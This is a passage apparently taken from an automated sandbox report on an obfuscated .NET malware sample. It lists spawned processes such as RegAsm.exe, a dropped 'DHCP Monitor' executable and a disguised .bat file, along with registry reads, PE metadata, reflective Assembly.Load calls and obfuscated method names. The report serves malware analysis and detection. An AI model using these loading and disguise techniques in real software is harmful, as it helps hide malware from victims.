        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeReversingLabs: Detection: 68%
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeReversingLabs: Detection: 68%
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile read: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeJump to behavior
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile read: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe 'C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat 'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: unknownProcess created: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe 'C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat 'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic file information: File size 1124888 > 1048576
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic file information: File size 1124888 > 1048576
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000001.00000002.517172717.0000000002705000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.pdb source: RegAsm.exe, 00000001.00000002.517172717.0000000002705000.00000004.00000040.sdmp
        Source: Binary string: RegAsm.pdb source: dhcpmon.exe, dhcpmon.exe.1.dr
        Source: Binary string: indows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000001.00000002.517172717.0000000002705000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: RegAsm.exe, 00000001.00000002.522683399.00000000051B0000.00000002.00000001.sdmp
        Source: Binary string: C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000001.00000002.517172717.0000000002705000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.pdb source: RegAsm.exe, 00000001.00000002.517172717.0000000002705000.00000004.00000040.sdmp
        Source: Binary string: RegAsm.pdb source: dhcpmon.exe, dhcpmon.exe.1.dr
        Source: Binary string: indows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000001.00000002.517172717.0000000002705000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: RegAsm.exe, 00000001.00000002.522683399.00000000051B0000.00000002.00000001.sdmp
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A3C304 LoadLibraryA,GetProcAddress,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A3C304 LoadLibraryA,GetProcAddress,
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: real checksum: 0xeeb70 should be: 0x11a301
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: real checksum: 0xeeb70 should be: 0x1196a5
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: real checksum: 0xeeb70 should be: 0x11a301
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: real checksum: 0xeeb70 should be: 0x1196a5
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E8B85 push ecx; ret
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E8B85 push ecx; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00E081F0 push eax; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00E062D1 push ebx; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00E062D4 push ebx; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00E09D78 pushad ; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D7902D push ebx; ret
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009A8B85 push ecx; ret
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
